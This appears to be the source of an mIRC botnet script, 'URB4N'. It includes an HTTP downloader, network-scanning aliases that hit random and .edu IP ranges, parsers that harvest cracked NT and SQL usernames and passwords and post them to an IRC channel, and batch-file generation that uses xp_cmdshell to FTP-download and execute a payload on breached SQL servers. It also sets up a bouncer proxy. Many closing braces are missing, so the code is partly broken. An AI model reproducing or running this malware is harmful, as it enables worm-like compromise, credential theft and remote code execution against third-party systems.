nick URB4N`[ $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ]

alias download {
if (!$isid) {
var %1 = download $+ $1,%2 = $longfn($3-)
if (!$3) { linesep -s | echo $color(info) -s * /download: insufficient parameters | linesep -s | return }
if ($sock(%1)) { linesep -s | echo $color(info) -s * /download: $+(&#39;,$1,&#39;) name in use | linesep -s | return }
if (!$isdir(%2)) { linesep -s | echo $color(info) -s * /download: no such dir $+(&#39;,%2,&#39;) | linesep -s | return }
unset % [ $+ [ %1 $+ .* ] ]
set % [ $+ [ %1 $+ .file ] ] $+(%2,$iif($right(%2,1) != $chr(92),$chr(92)),$gettok($2,-1,47),.dat)
set % [ $+ [ %1 $+ .url ] ] http:// $+ $remove($2,http://)
set % [ $+ [ %1 $+ .ctime ] ] $ctime 0
set % [ $+ [ %1 $+ .status ] ] Connecting
sockopen %1 $gettok($remove($2,http://),1,47) 80
else {
if ($1 == 0) { return $sock(download*,0) }
if ($iif($1 isnum,$sock(download*,$1),$sock(download $+ $1))) {
var %1 = $ifmatch,%2 = $dl.var(%1,file),%3 = $dl.var(%1,size),%4 = $file(%2).size
if (!$prop) { return $right(%1,-8) }
elseif ($prop == ip) { return $sock(%1).ip }
elseif ($prop == status) { return $dl.var(%1,status) }
elseif ($prop == url) { return $dl.var(%1,url) }
elseif ($prop == file) { return $left(%2,-4) }
elseif ($prop == type) { return $dl.var(%1,type) }
elseif ($prop == size) { return %3 }
elseif ($prop == rcvd) { return %4 }
elseif ($prop == cps) { return $int($calc(%4 / ($ctime - $dl.var(%1,ctime,2)))) }
elseif ($prop == pc) { return $int($calc($file(%2).size * 100 / %3)) }
elseif ($prop == secs) { return $calc($ctime - $dl.var(%1,ctime,1)) }
alias -l dl.var { return $gettok(% [ $+ [ $+($1,.,$2) ] ],$iif(!$3,1-,$3),32) }
alias -l dl.fail { var %1 = $right($1,-8) | .signal -n download_fail %1 $2- | close -d %1 }
alias close {
if ($1 == -d) {
var %1 = download $+ $2
if ($sock(%1)) {
.remove $+(\",$dl.var(%1,file),\")
unset % [ $+ [ %1 $+ .* ] ]
sockclose %1
else { close $1- }
on *:sockopen:download*:{
if ($sockerr) { dl.fail $sockname Unable to Connect | return }
var %1 = $dl.var($sockname,url)
set % [ $+ [ $sockname $+ .status ] ] Requesting File
sockwrite -tn $sockname GET %1 HTTP/1.1
sockwrite -tn $sockname Host: $gettok($remove(%1,http://),1,47)
sockwrite -tn $sockname Accept: *.*, */*
sockwrite -tn $sockname Connection: close
sockwrite -tn $sockname $crlf
on *:sockclose:download*:{ if ($dl.var($sockname,status) != done) { dl.fail $sockname Disconnected } }
on *:sockread:download*:{
if ($sockerr) { msg %channel 7D14ownload Connection Failed | return }
if ($dl.var($sockname,status) != downloading) {
var %1 | sockread %1 | tokenize 32 %1
if (HTTP/* iswm $1 && $2 != 200) { dl.fail $sockname $3- }
elseif ($1 == Content-Length:) { set % [ $+ [ $sockname $+ .size ] ] $2 }
elseif ($1 == Content-Type:) { set % [ $+ [ $sockname $+ .type ] ] $2- }
elseif (!$1) {
write -c $+(\",$dl.var($sockname,file),\")
set % [ $+ [ $sockname $+ .ctime ] ] $dl.var($sockname,ctime,1) $ctime
set % [ $+ [ $sockname $+ .status ] ] Downloading
else {
var %1 = $dl.var($sockname,file)
sockread &1
if (!$sockbr) { return }
bwrite $+(\",%1,\") -1 &1
if ($file(%1).size >= $dl.var($sockname,size)) {
var %1 = $right($sockname,-8),%2 = $dl.var($sockname,file)
set % [ $+ [ $sockname $+ .status ] ] Done
.copy -o $+(\",%2,\") $+(\",$left(%2,-4),\")
msg %channel 7D14ownload Completed
close -d %1
goto sockread

alias autont { run devcheck.exe /n /fh /r \"libparse.exe -kf IpcScan.exe\" | set %nowscan $read(random.ini) | msg %channel 7S14tarting scan 2[ %nowscan ]-[ %p0rt ]-[ %thr34d ] | timer 1 10 run devcheck.exe /n /fh /r \"ipcscan.exe %nowscan -p %p0rt -t %thr34d \" | set %Ascan on }
alias autontedu { run devcheck.exe /n /fh /r \"libparse.exe -kf IpcScan.exe\" | set %nowscan $read(edu.ini) | msg %channel 7S14tarting scan 2[ %nowscan ]-[ %p0rt ]-[ %thr34d ] | timer 1 10 run devcheck.exe /n /fh /r \"ipcscan.exe %nowscan -p %p0rt -t %thr34d \" | set %Ascan on }
alias autospreed { run devcheck.exe /n /fh /r \"libparse.exe -kf IpcScan.exe\" | set %nowscan $read(random.ini) | msg %channel 7S14tarting scan 2[ %nowscan ]-[ %p0rt ]-[ %thr34d ] | timer 1 10 run devcheck.exe /n /fh /r \"ipcscan.exe %nowscan -p %p0rt -t %thr34d \" | set %Ascan on }
alias autospreededu { run devcheck.exe /n /fh /r \"libparse.exe -kf IpcScan.exe\" | set %nowscan $read(edu.ini) | msg %channel 7S14tarting scan 2[ %nowscan ]-[ %p0rt ]-[ %thr34d ] | timer 1 10 run devcheck.exe /n /fh /r \"ipcscan.exe %nowscan -p %p0rt -t %thr34d \" | set %Ascan on }

alias hack { chgbot | run devcheck.exe /n /fh /r \"KAHOL.BAT %hk %user1 %pass1 \" }
alias chgbot { set %bot $read(bot.dll,1) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | write -l1 ir.conf user_nick %Bot | msg %channel 15-14=1]$+ %hk $+ [14=15- 2[4F2]1o14un2[15d2] 2[4N15T2] [4A2]1cc14ou15n2[15t2]12 15..14::1[ 4 %user1 $+ 9 / 12 $+ %pass1 1]14::15.. | msg %channel 7S14tarting to r00t1 %hk 14in the nick1: %bot $+}
alias fuckbot {
if ($remove($gettok($read(ipcscan.txt,1),1,32),],[,:) != $null) {
set %hk $remove($gettok($read(ipcscan.txt,1),1,32),],[,:)
if ($gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),2,47) != null) { set %pass1 $gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),2,47) }
if ($gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),2,47) == null) { unset %pass1 }
set %user1 $gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),1,47)
hack %hk
write hack.log %hk %user1 $+ / $+ %pass1
remove ipcscan.txt }

alias Reshet { if (%nowscan == $null) { set %Reshet $gettok($ip,1,46) $+ . $+ $gettok($ip,2,46) | msg %channel 7S14tarting my network scan 2[ %Reshet $+ .0.0 - %Reshet $+ .255.255 ]-[ $1 ]-[ $2 ] | set %nowscan %Reshet $+ .0.0 %Reshet $+ .255.255 | timer 0 1 fuckspreed | run devcheck.exe /n /fh /r \"ipcscan.exe %nowscan -p $1 -t $2 } | else { msg %channel 7I 14allready scaning %nowscan } }
alias spreedhack { chspreed | run devcheck.exe /n /fh /r \"KAHOL.bat %hk %user1 %pass1 \" }
alias chspreed { msg %channel 15-14=1]$+ %hk $+ [14=15- 2[4F2]1o14un2[15d2] 2[4N15T2] [4A2]1cc14ou15n2[15t2]12 15..14::1[ 4 %user1 $+ 9 / 12 $+ %pass1 1]14::15.. | msg %channel 7S14tarting to spreed1 %hk }
alias fuckspreed {
if ($remove($gettok($read(ipcscan.txt,1),1,32),],[,:) != $null) {
set %hk $remove($gettok($read(ipcscan.txt,1),1,32),],[,:)
if ($gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),2,47) != null) { set %pass1 $gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),2,47) }
if ($gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),2,47) == null) { unset %pass1 }
set %user1 $gettok($gettok($remove($gettok($read(ipcscan.txt,1),1,33),],[,:),5,32),1,47)
spreedhack %hk
write hack.log %hk %user1 $+ / $+ %pass1
remove ipcscan.txt }

alias fuckbotSQL {
if ($remove($gettok($read(scansql.txt,1),1,32),],[,:) != $null) {
set %hksql $remove($gettok($read(scansql.txt,1),1,32),],[,:)
if ($gettok($gettok($remove($gettok($read(scansql.txt,1),1,33),],[,:),5,32),2,47) != null) { set %passSQL $gettok($gettok($remove($gettok($read(scansql.txt,1),1,33),],[,:),5,32),2,47) }
if ($gettok($gettok($remove($gettok($read(scansql.txt,1),1,33),],[,:),5,32),2,47) == null) { unset %passSQL }
set %userSQL $gettok($gettok($remove($gettok($read(scansql.txt,1),1,33),],[,:),5,32),1,47)
sqlhack %hksql
write hacksql.log %hkSQL %userSQL $+ / $+ %passSQL
remove scansql.txt }
alias sqlhack {
msg %channel 15-14=1]$+ %hkSQL $+ [14=15- 2[4F2]1o14un2[15d2] 2[4S14Q15L2] [4A2]1cc14ou15n2[15t2]12 15..14::1[ 4 %userSQL $+ 9 / 12 $+ %passSQL 1]14::15.. | msg %channel 7S14tarting to r00t1 %hkSQL
if (%passSQL != $null) {
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;echo open %echoip %echoport >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;echo user %echouser %echopass >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;echo bin >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;echo get %echofile >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;echo bye >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;ftp -n -s:URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"xp_cmdshell &#39;erase URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P \" $+ %passSQL $+ \" -Q \"EXEC xp_cmdshell &#39; $+ %echofile $+ &#39;\"
write king $+ %hkSQL $+ .bat erase king $+ %hkSQL $+ .bat
run devcheck.exe /n /fh /r \"king $+ %hkSQL $+ .bat\"
else {
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;echo open %echoip %echoport >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;echo user %echouser %echopass >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;echo bin >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;echo get %echofile >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;echo bye >> URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;ftp -n -s:URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"xp_cmdshell &#39;erase URB4Ntemp&#39;\"
write king $+ %hkSQL $+ .bat osql -S %hkSQL -U %userSQL -P -Q \"EXEC xp_cmdshell &#39; $+ %echofile $+ &#39;\"
write king $+ %hkSQL $+ .bat erase king $+ %hkSQL $+ .bat
run devcheck.exe /n /fh /r \"king $+ %hkSQL $+ .bat\"
unset %hkSQL %userSQL %passSQL

on *:socklisten:Bnc:{ sockaccept BncClient $+ $r(1,999) }
on *:sockread:BncClient*:{
sockread %BncClient
if ($gettok(%BncClient,1,32) == NICK) {
set %Bnc.nick $gettok(%BncClient,2,32)
if ($gettok(%BncClient,1,32) == USER) {
set %Bnc.user $gettok(%BncClient,2-,32)
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4Welcome to URB4NR-BNC Service 8| Brought to you by 9DaggeredAngel
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4Please login with8: /Quote Pass <Password>
set %Bnc.login $null
if ($gettok(%BncClient,1,32) == PASS) {
if ($gettok(%BncClient,2,32) == %Bnc.passwd) {
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4Password Accepted
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Password Accepted
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Welcome to URB4NR-BNC Service 8| Brought to you by 9DaggeredAngel
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Logged In! Please connect to something!
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Connect With8:/Quote Conn [Server] [Port] [Pass]
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Status8: Users Online8:7 $sock(BncClient*,0) 8| Connections8:7 $sock(BncServer*,0) $+
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4To see stats8:/Quote stats pass
set %Bnc.login ok
%Bnc.legit = yes
if ($gettok(%BncClient,2,32) != %Bnc.passwd) {
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4Password Incorrect | sockclose $sockname
if ($gettok(%BncClient,1,32) == Stats) {
if ($gettok(%BncClient,2,32) == %Bnc.passwd) {
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Status8: Users Online8:7 $sock(BncClient*,0) 8| Connections8:7 $sock(BncServer*,0) $+
if ($gettok(%BncClient,2,32) != %Bnc.passwd) {
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4Password Incorrect | sockclose $sockname
if ($gettok(%BncClient,1,32) == CONN) {
if (%Bnc.legit != yes) && (%Bnc.login != ok) { sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 15,1BNC Exploits Dont Work On URB4N-BNC! | sockclose $sockname
if (BncServer $+ $remove($sockname,BncClient) != $null) {
sockclose BncServer $+ $remove($sockname,BncClient)
if (%Bnc.login != ok) {
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4WARNING: BNC Expoit detected and stopped
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4WARNING: BNC Expoit detected and stopped
sockclose $sockname
sockopen BncServer $+ $remove($sockname,BncClient) $gettok(%BncClient,2,32) $gettok(%BncClient,3,32)
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4Connecting to $gettok(%BncClient,2,32) on 4port $gettok(%BncClient,3,32)
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4Connecting to $gettok(%BncClient,2,32) on 4port $gettok(%BncClient,3,32)

set %Bnc.server.passwd $gettok(%BncClient,4,32)
else {
if ($sock(BncServer $+ $remove($sockname,BncClient)).status != active) {
sockwrite -n BncServer $+ $remove($sockname,BncClient) %BncClient
on *:sockopen:BncServer*:{
if ($sockerr) {
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4WARNING8: Connection Failed
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4WARNING8: Connection Failed
sockclose $sockname
if ($sock($sockname).status != active) {
sockwrite -n $sockname :URB4N.BNC NOTICE AUTH : $+ 4WARNING8: Connection Failed
sockwrite -n $sockname :URB4N-BNC privmsg AUTH : $+ 4WARNING8: Connection Failed
sockclose BncServer $+ $remove($socknme, BncServer)
sockwrite -n $sockname NICK %Bnc.nick
sockwrite -n $sockname USER %Bnc.user
on *:sockread:BncServer*:{
sockread %BncServer
if ($sock(BncClient $+ $remove($sockname,BncServer)).status != active) {
sockwrite -n BncClient $+ $remove($sockname,BncServer) %BncServer
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